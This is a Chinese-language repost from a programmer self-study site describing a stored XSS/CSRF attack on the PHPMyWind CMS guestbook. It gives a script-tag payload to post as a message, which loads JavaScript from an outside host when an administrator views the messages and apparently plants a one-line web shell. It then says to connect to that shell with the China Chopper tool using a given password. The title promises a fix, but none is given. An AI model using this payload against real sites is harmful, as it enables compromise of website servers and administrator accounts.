好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

phpmywind留言板xss & csrf漏洞及修复 - 网站安全

这个 漏洞 在法客 论坛 公布的,我也发一下。

漏洞利用条件

留言代码

<script src=]http:// HdhCmsTest2cto测试数据 /admin/Inc/mywind.js]></script>

 

接下来就是等了  这个是个新出的 cms     管理员肯定会去猛看留言 每天 访问   case.php

 

http://HdhCmsTest2cto测试数据 /case.php

然后等待这个页面变空白

管理员后台点击留言板就会变空白然后就一句话

然后菜刀一句话连接   密码:  sex()

这样就可以了 摘自 http://madman.in/madman5/365. html

查看更多关于phpmywind留言板xss & csrf漏洞及修复 - 网站安全的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11952
  阅读:42次

上一篇: actcms网站管理系统漏洞0day - 网站安全 - 自学ph

下一篇:QQ空间存储型XSS漏洞(组合利用) - 网站安全 -